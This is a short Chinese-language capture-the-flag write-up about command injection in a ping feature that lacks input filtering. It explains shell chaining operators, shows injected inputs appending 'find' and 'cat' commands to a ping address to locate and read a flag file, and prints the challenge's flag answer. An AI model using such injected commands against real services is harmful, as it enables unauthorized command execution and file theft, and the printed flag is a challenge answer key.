xctf 小宁写了个ping功能,但没有写WAF,X老师告诉她这是非常危险的
【题目描述】
小宁写了个ping功能,但没有写WAF,X老师告诉她这是非常危险的,你知道为什么吗。
【目标】
掌握有关命令执行的知识
windows或linux下:
command1 && command2 先执行command1,如果为真,再执行command2
command1 | command2 只执行command2
command1 & command2 先执行command2后执行command1
command1 || command2 先执行command1,如果为假,再执行command2
命令执行漏洞(| || & && 称为 管道符) 构造语句
输出
ping -c 3 127.0.0.1 && find /home -name flag*
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.068 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.058 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.050 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 0.050/0.058/0.068/0.011 ms
/home/flag.txt
得到flag位置,继续构造
得到结果:
ping -c 3 127.0.0.1 && cat /home/flag.txt
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.053 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.044 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.049 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 0.044/0.048/0.053/0.008 ms
cyberpeace{8b8e359f89d584845ad41ae2fcc02d1e}
cyberpeace{8b8e359f89d584845ad41ae2fcc02d1e}就是flag